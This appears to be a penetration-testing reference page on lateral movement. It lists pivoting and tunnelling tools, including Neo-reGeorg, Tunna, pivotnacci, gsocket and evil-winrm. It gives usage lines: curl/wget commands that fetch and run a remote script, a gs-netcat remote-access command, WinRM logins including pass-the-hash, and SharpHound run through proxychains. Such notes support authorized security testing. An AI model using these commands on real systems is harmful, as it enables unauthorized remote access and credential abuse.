Lateral Movement

Neo-reGeorg: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

Tunna: Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.

pivotnacci: Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server that communicates with HTTP agents. The architecture looks like the following:

ngrok: Spend more time programming. One command for an instant, secure URL to your localhost server through any NAT or firewall.

gsocket: The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.

Use either one of these two commands to deploy:

bash -c "$(curl -fsSL gsocket.io/x)"
bash -c "$(wget -qO- gsocket.io/x)"

Use either one of these two commands to uninstall:

GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"

Access the remote host from anywhere in the world:

$ gs-netcat -s ExampleSecretChagneMe -i

evil-winrm: This shell is the ultimate WinRM shell for hacking/pentesting.

ruby evil-winrm.rb -i 10.10.10.161 -u username -p passw0rd
ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
ruby evil-winrm.rb -i 10.10.10.149 -u 'DOMAIN\USER' -p 'passw0rd

proxychains windows

.\proxychains_win32_x64.exe -f .\proxychains.conf C:\Users\IEUser\Downloads\SharpHound.exe --collectionmethods All

Previous(De)serialization NextPowershell

Last updated 2 years ago